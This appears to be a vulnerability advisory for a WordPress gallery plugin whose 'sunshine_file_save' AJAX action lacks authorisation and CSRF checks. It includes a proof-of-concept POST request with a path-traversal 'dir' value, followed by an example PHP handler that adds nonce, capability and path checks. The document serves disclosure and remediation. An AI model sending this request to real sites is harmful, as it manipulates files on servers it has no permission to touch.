The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) checks in an AJAX action, which could allow any authenticated user, such as a subscriber, to copy the gallery files to another folder.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=sunshine_file_save&gallery_id=1&dir=..%2Ftest&item_number=100
This function copies the jpg files from /uploads/test to the /uploads/sunshine/1 folder.
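One way to add the missing checks, as an added example that is not the plugin's own code: a handler for the `sunshine_file_save` action that verifies a nonce, requires a capability, and confines `dir` before copying. The function name, nonce action, the `upload_files` capability and the `sunshine/upload` import root are assumptions.

```php
<?php
// Added example: function name, nonce action, capability and import root
// are assumptions, not the plugin's own code.
add_action( 'wp_ajax_sunshine_file_save', 'example_sunshine_file_save' );
// No wp_ajax_nopriv_ hook is registered, so logged-out requests are rejected.

function example_sunshine_file_save() {
	// CSRF check: dies with 403 unless the "nonce" field holds a valid nonce.
	check_ajax_referer( 'example_sunshine_file_save', 'nonce' );

	// Authorisation: being logged in is not enough; subscribers lack this capability.
	if ( ! current_user_can( 'upload_files' ) ) {
		wp_send_json_error( 'Forbidden', 403 );
	}

	$gallery_id = isset( $_POST['gallery_id'] ) ? absint( $_POST['gallery_id'] ) : 0;
	$dir        = isset( $_POST['dir'] ) ? wp_unslash( $_POST['dir'] ) : '';
	if ( ! $gallery_id || ! is_string( $dir ) || '' === $dir ) {
		wp_send_json_error( 'Bad request', 400 );
	}

	// Confine the source: resolve symlinks and ".." first, then require the
	// result to sit under the import root, so dir=../test is refused.
	$uploads = wp_upload_dir();
	$root    = realpath( $uploads['basedir'] . '/sunshine/upload' ); // assumed root
	$source  = $root ? realpath( $root . '/' . $dir ) : false;
	if ( ! $source || ! is_dir( $source )
		|| 0 !== strpos( $source . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR ) ) {
		wp_send_json_error( 'Invalid directory', 400 );
	}

	// Destination derives only from the validated integer gallery ID.
	$dest = $uploads['basedir'] . '/sunshine/' . $gallery_id;
	if ( ! wp_mkdir_p( $dest ) ) {
		wp_send_json_error( 'Cannot create destination', 500 );
	}
	$copied = 0;
	foreach ( glob( $source . '/*.jpg' ) ?: array() as $file ) {
		$name = sanitize_file_name( basename( $file ) );
		if ( copy( $file, $dest . '/' . $name ) ) {
			$copied++;
		}
	}
	wp_send_json_success( array( 'copied' => $copied ) );
}
```

The admin page that issues the request has to send a `nonce` field generated with `wp_create_nonce( 'example_sunshine_file_save' )`.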